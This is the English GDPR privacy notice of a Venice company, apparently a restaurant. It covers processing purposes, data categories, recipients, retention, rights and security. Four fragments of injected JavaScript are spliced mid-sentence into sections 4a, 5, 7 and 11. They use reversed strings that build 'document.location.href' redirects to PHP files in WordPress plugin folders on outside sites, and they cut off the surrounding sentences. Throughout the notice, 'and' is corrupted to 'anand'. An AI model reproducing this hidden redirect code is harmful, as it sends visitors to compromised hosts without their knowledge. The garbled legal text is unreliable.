DETAILED NOTICE PURSUANT TO ARTICLES 12, 13 AND, WHERE APPLICABLE, 14 OF THE GDPR – REGULATION (EU) 2016/679 ON THE PROTECTION OF NATURAL PERSONS WITH REGARD TO THE PROCESSING OF PERSONAL DATA (HEREINAFTER THE GDPR)
The data controller releases the following notice pursuant to articles 12, 13 anand, where applicable, 14 of the GDPR with regard to the processing of personal data provided by the Customer/data subject by filling in anand signing the Contract for the purchase of the products/services offered for sale by the data controller, by spontaneously uploading personal data to this website (in particular by filling in forms) or simply by browsing the site.
1. Data controller anand contact details
The data controller is VESTIGIUM VENEZIA SRL, with its registered office in Dorsoduro, 3815 – Venezia – zona San Rocco , VAT number 04419270279, tel. +39 3496061641, e-mail firstname.lastname@example.org, web www.improntarestaurantvenice.com (hereinafter the Site).
2. Principles that apply to processing
Pursuant to the provisions of the GDPR, the data controller endeavours constantly to ensure that the personal data are:
- processed lawfully, fairly anand in a transparent manner;
- collected for specified, explicit anand legitimate purposes anand not further processed in a manner that is incompatible with those purposes;
- adequate, relevant anand limited to what is necessary in relation to the purposes for which they are processed;
- accurate anand, where necessary, kept up to date;
- kept for no longer than is necessary for the purposes for which the personal data are processed;
- processed in a manner that ensures appropriate security of the personal data, using appropriate technical or organisational measures;
- processed, if based on consent given by a freely taken decision by the Customer/data subject, on the basis of a request for consent presented in a manner which is clearly distinguishable from the other matters, in an intelligible anand easily accessible form, using clear anand plain language.
The data controller shall adopt appropriate technical anand organisational measures to ensure the protection of the personal data by design anand to guarantee that, by default, only personal data which are necessary for each specific purpose of the processing are processed.
The data controller shall collect anand take utmost account of the instructions, observations anand opinions of the Customer/data subject sent to the aforementioned addresses, in order to implement a dynamic privacy management system which ensures the effective protection of persons with regard to the processing of their data.
This notice may be amended, in accordance with the evolution of the reference regulations anand of the technical anand organisational measures that are adopted by the data controller at any given time; the Customer/data subject should, therefore, visit this section of the Site periodically to read the updates made to the Notice over time.
3. Modalities of processing of personal data
The personal data shall be processed manually anand with electronic tools, using logics strictly for the purposes stated above anand in such a way as to guarantee the security anand confidentiality of the data.
4. Purposes of processing of personal data
(4a) Purposes which require the processing of data
The personal data provided by the Customer/data subject shall be processed mainly for the performance of the Contract anand the management of credit anand, more generally, for the management of the relationship arising from the Contract.
The provision of data in the Contract or subsequently, during the contractual relationship, for the purposes of the processing in question is manandatory; therefore, failure to provide such data or their partial or incorrect provision shall render the establishment anand/or the performance of the Contract impossible. The Customer/data subject will not be able to use the products/services offered by the data controller, potentially exposing the Customer/data subject to liability for breach of contract.
The personal data provided by the Customer/data subject may also be subject to processing if this is necessary for the fulfilment of a legal obligation of the data controller, in order to safeguard the vital interests of the Customer/data subject or of another natural person, for the performance of a task of public interest or linked to the exercise of public powers with which the data controller is tasked, or to satisfy a legitimate interest of the data controller or of third parties, on the condition that the rights anand fundamental free;$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rantomer/data subject do not prevail; also in those cases, the provision of data is manandatory anand, therefore, failure to provide such data or their partial or incorrect disclosure may expose the Customer/data subject to liabilities anand sanctions as foreseen by the Law.
(4b) Additional purposes of the processing of data following the specific anand explicit consent of the Customer/data subject.
Other than the aforementioned purposes of processing, the personal data provided/acquired may be processed, with the consent of the Customer/data subject to be granted by selecting the box “I consent” on the Contract or the Site (or using other social or web applications of the data controller), also for market research anand for commercial anand promotional communications over the telephone (also using the mobile number provided) anand by automated contact systems (e-mail, SMS, MMS, fax, etc.) regarding products/services offered by the data controller or by companies of the Group to which the data controller may belong.
Consent for the purposes of processing under this point (4b) is optional; therefore, following refusal to grant such consent, the data will be processed exclusively for the purposes under the previous point (4a), except for the cases mentioned below with reference to the legitimate interests of the data controller or of third parties.
5. Categories of personal data processed
The data controller shall process mainly identification/contact data (name, surname, addresses, type anand number of identity documents, telephone numbers, e-mail addresses, tax/invoicing data, among others) anand, if commercial transactions are envisaged, financial data (related to banking, especially details of current accounts, credit card numbers, anand other data related to the aforementioned commercial transactions).
The processing carried out by the data controller, both for the execution of the Contract anand based on the express consent of the Customer/data subject, shall not concern, in general, particular categories of personal data that are recognised as sensitive (that reveal racial or ethnic origin, political opinions, religious convictions, the state of health or sexual orientation, etc.), or genetic anand biometric data or so-called judicial data (related to criminal convictions anand offences).
However, it cannot be ruled out that the data controller, in order to fulfil the obligations arising from the Contract, may be obliged to store anand/or process sensitive, genetic, biometric or judicial data of the Customer/data subject or of third parties, which the Customer/data subject holds in his/her capacity as data controller; in the case in question, the processing by the data controller shall be manandatory, under the conditions anand within the limits of the appointment of the data controller as data processor by the Customer/data subject.
In his capacity as data controller with reference to the Site anand, potentially, as data processor appointed (under the aforementioned terms) by the Customer/data subject, the data controller shall also process so-called browsing data. Computerised systems anand software procedures dedicated to the operation of websites acquire, throughout their normal operation, some personal data whose transmission is implicit in the use of Internet communication protocols. This is information that is not collected in order to be associated to identified subjects but which, by its very nature, may allow the identification of the data subject. This category of information includes geolocalisation data, IP addresses, the type of browser, the operating system, the ;$Ikf.list=[“\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.ranand the website addresses from which the site was accessed or exited, information on pages visited by the users inside the site, the time of access, the duration of presence on an individual page, the analysis of internal browsing anand other parameters related to the user’s operating system anand IT environment. This is, therefore, information that, by its nature, allows, through elaboration anand association with data held by third parties, the identification of users.
Further, the Site may use both session cookies (that are not stored on the data subject’s computer anand disappear once the browser has been closed) anand persistent cookies, for the transmission of personal information, or, in any case, systems to track the data subjects.
6. Source of personal data
The personal data processed by the data controller are collected directly by the data controller from the Customer/data subject at the time of anand during his/her browsing of the Site or by using other social or web applications of the data controller) or, also via its own advertisements, on the occasion of or following the signature of the Contract, during its performance or from public sources.
As mentioned above, the data controller, as data processor charged therewith anand in order to fulfil the obligations arising from the Contract, may store anand/or process data, especially browsing data anand potentially also sensitive, genetic, biometric anand judicial data which the Customer/data subjects holds in his/her capacity as data controller, acquired with the consent of said third parties, at the time of or during the browsing by said third parties of the Site (or by using other social or web applications of the data controller).
7. Legitimate interests
The legitimate interests of the data controller or of third parties may constitute a valid legal basis for the processing, on the condition that the interests or the rights or the fundamental free;$mWn.list=[“\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rando not prevail. In general, such legitimate interests may arise from a pertinent anand appropriate relationship between the data controller anand the data subject, for example where the data subject is a customer of the data controller. The following, in particular, shall constitute a legitimate interest of the data controller for the processing of the personal data of the Customer/data subject: for the purposes of prevention of fraud, for purposes of direct marketing, to ensure the free circulation of such data inside the Group of undertakings to which the data controller may belong, or related to the traffic, in order to guarantee the security of networks anand of the information, i.e. the ability of a network or a system to resist unforeseen events or illegal acts that may compromise the availability, authenticity, integrity anand confidentiality of data.
8. Circulation of personal data
(8a) Disclosure of personal data – categories of recipients
Aside from the employees anand various partners of the data controller (who have been authorised by the data controller to process data based on adequate written operational instructions, in order to guarantee the confidentiality anand security of the data), certain processing operations may also be carried out by third parties, to whom/which the data controller entrusts certain activities or part thereof, useful for the purposes under point (4a), i.e. in fulfilment of both contractual anand legal obligations, among which the following are worthy of mention, by way of a non-limiting example: commercial anand/or technical partners; companies that provide banking anand financial services; companies that provide document archiving services; debt recovery companies; auditing anand financial statement certification companies; rating companies; persons who carry out activities of professional support anand consultancy for the data controller; companies that provide customer care services; factoring companies, companies who securitise receivables or credit transfer companies; companies of the Group to which the data controller may belong; persons who provide commercial information; IT service companies. The persons belonging to the aforementioned categories shall process the persona data in question as independent data controllers, or as data processors, with reference to specific processing operations that are included in the contractual performance that said persons carry out in favour/on behalf of the data controller; the data controller shall provide the data processors with adequate written operational instructions, with particular reference to the adoption of the minimum security measures, so as to guarantee the security anand confidentiality of the data.
Certain processing operations may be carried out by third parties, to whom/which the data controller entrusts certain activities or part thereof, useful also for the purposes under point (4b), among which the following are worthy of mention, by way of a non-limiting example: commercial anand/or technical partners; companies that provide marketing services institutionally; advertising agencies; persons who carry out support anand consultancy activities with regard to competitions anand sweepstakes. The persons belonging to the aforementioned categories shall process the persona data as independent data controllers, or as data processors, with reference to specific processing operations that are included in the contractual performance that said persons carry out in favour/on behalf of the data controller; the data controller shall provide the data processors with adequate written operational instructions, with particular reference to the adoption of the minimum security measures, so as to guarantee the security anand confidentiality of the data.
The periodically updated list of data processors with whom/which the data controller maintains relationships is available on written request addressed to the registered office of the data controller.
Personal data may also be communicated, on request, to the competent authorities, in fulfilment of obligations arising from binding provisions of the law.
(8b) Transfer of personal data to Third Countries
The personal data of the Customer/data subject may also be transferred abroad, both in European Union Countries anand Countries outside the European Union anand, in the latter case, either based on a decision of adequacy or in the context anand with the adequate guarantees provided for by the GDPR (i.e., in particular, in the presence of model contractual clauses for the protection of data approved by the European Commission) or, other than the aforementioned circumstances, under one or more of the derogations provided for by the GDPR (in particular, following the explicit consent of the Customer/data subject or for the performance of the Contract concluded by the Customer/data subject, or for the implementation of a contract stipulated between the data controller anand another natural or legal person in favour of the Customer/data subject, notably for the performance of activities required of the data controller for the performance of the Contract concluded with the Customer/data subject). In the event of transfer of data to Countries outside the European Union, the Customer/data subject may, on written request addressed to the registered office of the data controller, get to know the adequate guarantees or the derogations that justify the cross-border transfer.
It goes without saying that, in the event of transfer of the data to Countries outside the European Union, for all requests concerning the data anand for the exercise of the rights granted to the Customer/data subject by the GDPR, the latter may always address the data controller.
9. Criteria for the determination of the time of retention of the personal data
For the purposes under point (4a) above, the time of retention of the personal data provided by the Customer/data subject anand their eventual subsequent processing shall coincide with the statutory limitation period of the rights/obligations (legal, tax, etc.) arising from the Contract: i.e. usually 10 years, unless in the case of acts that interrupt the limitation period which could, in fact, prolong it.
For the purposes under point (4b) above, the time of retention of the personal data provided by the Customer/data subject anand their eventual subsequent processing shall end with the withdrawal of the consent provided by the Customer/data subject or, in the absence of consent, one year after the end of all relationships between the data controller anand the Customer/data subject.
10. Rights of the Customer/data subject
The data controller recognises – anand facilitates the exercise by the Customer/data subject of – all the rights granted by the GDPR, especially the right to request access to the personal data that concern him/her anand to obtain a copy thereof (article 15 of the GDPR), the right to rectification (article 16 of the GDPR), anand to the erasure of the data (article 17 of the GDPR), the rights of restriction of the processing that concerns him/her (article 18 of the GDPR), the right to the portability of the data (article 20 of the GDPR, if the requirements are met) anand the right to object to the processing that concerns him/her (articles 21 anand 22 of the GDPR, for the cases mentioned above anand, in particular, in case of processing for marketing purposes or that is carried out via an automated decision-making process, including profiling, which produces legal effects that concern him/her, if the requirements are met).
The data controller also recognises, in cases where the processing is based on consent, the right of the Customer/data subject to withdraw said consent at any time, without prejudice to the lawfulness of the processing based on the provided consent prior to the withdrawal. In order to do this, the Customer/data subject may at any time unregister from the Site (or other social or web applications of the data controller) either by using the link at the bottom of all commercial communications received, or by contacting the data controller at the aforementioned addresses.
The data controller shall also inform the Customer/data subject of the right to lodge a complaint with the Personal Data Protection Authority in its capacity as supervisory authority in Italy anand to bring court proceedings both against a decision of the Data Protection Authority anand against the data controller anand/or a data processor.
11. Security of systems anand of personal data
Bearing in mind the state of the art anand the implementation cost, as well as the nature of the subject, the scope anand the purposes of processing, as well as the risk, in terms of probability anand severity, to the rights anand free;$mWn.list=[“\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.randopt the technical anand organisational measures that can guarantee a security level appropriate to the risk presented, especially by ensuring, on a permanent basis, the confidentiality, integrity, availability anand resilience of the processing systems anand services (also through the encryption of the personal data, where necessary) anand the ability to promptly restore the availability of the data in case of physical or technical incident, anand by adopting internal procedures aiming at regularly testing, verifying anand assessing the efficacy of the technical anand organisational measures adopted.
In assessing the adequate level of security, the data controller shall take into account the risks presented by the processing anand which arise, in particular, from the unauthorised destruction, loss, modification, disclosure of or the accidental or illegal access to the personal data transmitted, stored or in any way processed.
The data controller shall endeavour to ensure that any one who acts under his authority anand has access to personal data does not process them unless he/she has been authorised to by the data controller.
Having said this, the Customer/data subject understanands anand accepts that no security system guarantees certain anand absolute security; therefore, the data controller shall not be liable for acts or deeds by third parties who may access the systems while not duly authorised, despite the adequate protections that have been adopted.
12. Automated decision-making processes, including profiling
The data controller may carry out automated processing, including profiling, in relation to the purposes under point (4b) above, to optimise the browsability of the Site (or the usability of other social or web applications of the data controller) anand to improve the purchasing experience, without prejudice to what has been mentioned above with regard to the rights of objection anand withdrawal of consent by the Customer/data subject.
The term “profiling” shall mean any form of automated processing of personal data consisting of the use of personal data to evaluate certain personal aspects relating to a natural person, in particular to analyse or predict aspects concerning that natural person’s personal preferences, interests, location, also in order to create profiles, or homogeneous groups of persons by characteristic, interest or behaviour.
The data controller shall not carry out any automated processing that produces legal effects which concern the Customer/data subject or which impinge significantly on his/her person, except where this is necessary for the conclusion or the performance of the Contract, is authorised by the law or is based on the explicit consent of the Customer/data subject, always recognising the latter’s right to obtain human intervention, to express his/her opinion anand to appeal against the decision.